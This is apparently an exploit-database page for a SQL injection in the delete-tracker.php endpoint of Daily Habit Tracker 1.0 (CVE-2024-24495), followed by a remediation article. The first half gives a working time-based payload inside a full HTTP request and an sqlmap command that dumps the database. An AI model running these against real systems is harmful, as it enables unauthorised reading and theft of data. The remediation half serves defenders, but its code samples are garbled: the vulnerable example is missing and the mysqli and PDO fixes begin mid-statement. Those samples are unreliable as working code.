Daily Habit Tracker 1.0 - SQL Injection

Exploit Author: Yevhenii Butenko Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-04-02

# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24495

### SQL Injection:

> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.

### Affected Components:

> delete-tracker.php

### Description:

> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.

## Proof of Concept:

### Manual Exploitation

The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```

![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)

### SQLMap

Save the following request to `delete_tracker.txt`:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```

Use `sqlmap` with `-r` option to exploit the vulnerability:

```
sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump
```

## Recommendations

When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 — SQL Injection (CVE-2024-24495)

This article analyzes a confirmed SQL Injection vulnerability in the "Daily Habit Tracker" 1.0 application (tracked as CVE-2024-24495), explains why it occurs, and provides practical, secure remediation advice for developers, system administrators, and security reviewers. Content focuses on accurate technical detail, secure coding patterns, detection guidance, and incident mitigation best practices.

Summary of the issue

A server-side endpoint used to delete trackers (delete-tracker.php) performs unsanitized concatenation of input into SQL statements. This allows an attacker who can reach the endpoint to manipulate the SQL query and influence the database — potentially reading or modifying data, or causing other undesirable effects. The vulnerability is classified generically as SQL Injection (SQLi).

Affected component

File: delete-tracker.php
Application: Daily Habit Tracker 1.0
CVE: CVE-2024-24495

Why this vulnerability occurs

SQL Injection occurs when user-controlled input is combined directly into a SQL statement without proper separation or validation. Common root causes include:

String concatenation of request parameters into SQL.
Absence of parameterized queries or prepared statements.
Missing input validation and weak database user privileges.

Typical vulnerable pattern (example)

Explanation: The code above reads a request parameter and injects it directly into a SQL statement. If an attacker can control $tracker_id, they can alter the structure of the query. This snippet intentionally demonstrates the anti-pattern so reviewers can recognize it.

Secure correction using prepared statements (mysqli)

prepare("DELETE FROM trackers WHERE id = ?");
$stmt->bind_param("i", $tracker_id);
$stmt->execute();
$stmt->close();
?>

Explanation: This corrected version uses filter_input with FILTER_VALIDATE_INT to enforce that the tracker id is an integer. It then uses a prepared statement with a parameter placeholder (?) so the database engine receives the value separately from the SQL text. Using bind_param prevents user input from changing query structure.

Alternative secure correction using PDO

 PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

$stmt = $pdo->prepare("DELETE FROM trackers WHERE id = :id");
$stmt->execute([':id' => $tracker_id]);
?>

Explanation: The PDO version binds the value by name and disables emulated prepares to ensure the driver uses native prepared statements where available. This reduces the risk of SQL injection while keeping code concise.

Additional defensive measures

Input validation & whitelisting: Prefer strict type and range checks (e.g., integers, expected lengths), or use a whitelist of allowed values.
Least-privilege DB user: The application database user should only have the permissions it needs (for example, DELETE/INSERT/UPDATE only for relevant tables, no DROP or administrative privileges).
Use ORM or query builders: Libraries that abstract SQL reduce developer mistakes but still require correct usage and configuration.
Escape outputs: For HTML responses, always escape data to prevent XSS; escaping is separate from SQL protection.
Parameterize all queries: Never concatenate user input into SQL — use prepared statements for SELECT, INSERT, UPDATE, DELETE, and DDL when possible.
Centralize DB access: Keep a single database access layer to enforce consistent practices and reduce risk.
Audit and logging: Log unexpected errors and suspicious patterns (with care to avoid logging sensitive data). Monitor logs for unusual access patterns.

Testing and detection guidance

Security testing should be performed only with proper authorization on systems you own or have explicit permission to test. To detect SQL injection issues in a codebase and running application:

Static code review: Search for string concatenation patterns that combine user input into SQL — e.g., building SQL with variables inserted directly.
Dynamic scanning: Use web application scanners and interactive testing tools to identify potential injection points. These tools can provide indicators of injectable parameters, but use them responsibly and with permission.
Manual review: Inspect endpoints that take identifiers (IDs) or text input and verify that the server enforces types and uses prepared statements.
Logging and monitoring: Watch for irregular database errors or unexpected query execution times which can suggest attempted exploitation.

Responsible testing considerations

If you are testing an application, ensure you have written authorization from the owner and perform tests in a controlled environment (staging/QA) rather than production. Avoid publishing exploit details that would enable miscreants to attack live targets.

Incident response and remediation steps

Patch the vulnerable code to use prepared statements and proper validation as shown above.
Rotate database credentials used by the application after confirming the compromise status or when privilege escalation is suspected.
Review database logs for suspicious queries and scope the impact (data exfiltration, modification, or destructive commands).
Restore integrity: if data was modified, recover from known-good backups after analysis.
Harden environment: remove unnecessary privileges, apply network segmentation, and enable relevant application and DB hardening controls.
Perform a post-mortem and integrate lessons into secure development lifecycle (SDLC) processes.

Secure configuration checklist

Area	Recommended action
Database user privileges	Grant only required permissions; avoid administrative rights for application users
Queries	Parameterize all SQL; avoid string concatenation of inputs
Input validation	Use strict type checks, whitelists, and server-side validation
Logging	Capture suspicious activity; avoid logging sensitive values in plaintext
Testing	Regular SAST/DAST scans and authorized penetration tests

Quick reference — what to prioritize

Immediate: Replace concatenated SQL in delete-tracker.php with prepared statements and validate the tracker id as an integer.
Short-term: Rotate DB credentials and review logs for signs of exploitation.
Medium-term: Add automated tests (unit and integration) to assert that endpoints reject invalid input and that prepared statements are used.
Long-term: Integrate secure coding checklists into the development process and perform periodic security reviews.

References and further reading

OWASP SQL Injection Prevention Cheat Sheet — covers input validation, parameterized queries, and other mitigations.
PDO and mysqli official PHP documentation — examples of prepared statements and secure DB access patterns.
Secure development lifecycle materials — for integrating security into build and release processes.